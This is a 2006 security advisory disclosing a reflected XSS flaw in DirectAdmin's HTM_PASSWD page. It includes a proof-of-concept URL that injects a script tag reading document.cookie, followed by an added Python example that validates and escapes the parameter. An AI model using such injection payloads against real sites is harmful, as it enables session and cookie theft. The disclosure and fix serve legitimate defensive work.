DirectAdmin.txt

2006-04-30T00:00:00
ID PACKETSTORM:45955
Type packetstorm
Reporter Outlaw
Modified 2006-04-30T00:00:00

Description

#'''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
#Aria-Security.net Advisory
#Discovered by: O.U.T.L.A.W
#Outlaw@aria-security.net
#Gr33t to: A.u.r.a & R@1D3N & Cl0wn & Dtrap
#'''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
Software: DirectAdmin
Support Website: http://www.Directadmin.com
Advisory: http://www.aria-security.net/advisory/hm/directadmin.txt
Summary: DirectAdmin is a hosting management system
Tested On: http://www.directadmin.com/demo.html

Proof of Concept:
LOCAL XSS attack:
http://www.directadmin.com:2222/HTM_PASSWD?domain=".><script>alert(document.cookie)</script><!--

Solution:
Contact advisory@aria-security.net
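A server-side guard for the `domain` parameter used in the proof of concept, as an added example (it is not DirectAdmin's code and not part of the advisory). It assumes the value is echoed inside a quoted HTML attribute, which the `".>` prefix of the PoC suggests; the function names, the hostname pattern and the HTML fragments are illustrative.

```python
import html
import re
from urllib.parse import urlsplit, parse_qs

# Hostname grammar (assumption): dot-separated letter/digit/hyphen labels,
# 1-63 characters each, at most 253 characters in total.
_LABEL = r"(?!-)[A-Za-z0-9-]{1,63}(?<!-)"
_HOSTNAME = re.compile(rf"{_LABEL}(?:\.{_LABEL})*\.?")


def validate_domain(value):
    """Return the normalised domain, or None if it is not a plain hostname."""
    if len(value) > 253 or not _HOSTNAME.fullmatch(value):
        return None
    return value.rstrip(".").lower()


def render_domain_field(url):
    """Build the HTML fragment for a request URL (hypothetical template).

    Validation is the primary control; html.escape(quote=True) is still
    applied to every reflected value so that a gap in validation cannot
    turn into markup.
    """
    params = parse_qs(urlsplit(url).query, keep_blank_values=True)
    raw = params.get("domain", [""])[0]
    domain = validate_domain(raw)
    if domain is None:
        # Rejected input is echoed only in encoded form.
        return '<p class="error">Invalid domain: %s</p>' % html.escape(raw, quote=True)
    return '<input type="hidden" name="domain" value="%s">' % html.escape(domain, quote=True)


# Request from the advisory's proof of concept, and a constructed benign one.
POC_URL = ('http://www.directadmin.com:2222/HTM_PASSWD'
           '?domain=".><script>alert(document.cookie)</script><!--')
BENIGN_URL = "http://www.directadmin.com:2222/HTM_PASSWD?domain=Example.COM"

if __name__ == "__main__":
    print(render_domain_field(POC_URL))
    print(render_domain_field(BENIGN_URL))
```

With the PoC request the quote, angle brackets and comment opener come back as `&quot;`, `&lt;` and `&gt;`, so the browser renders them as text instead of closing the attribute and starting a script element.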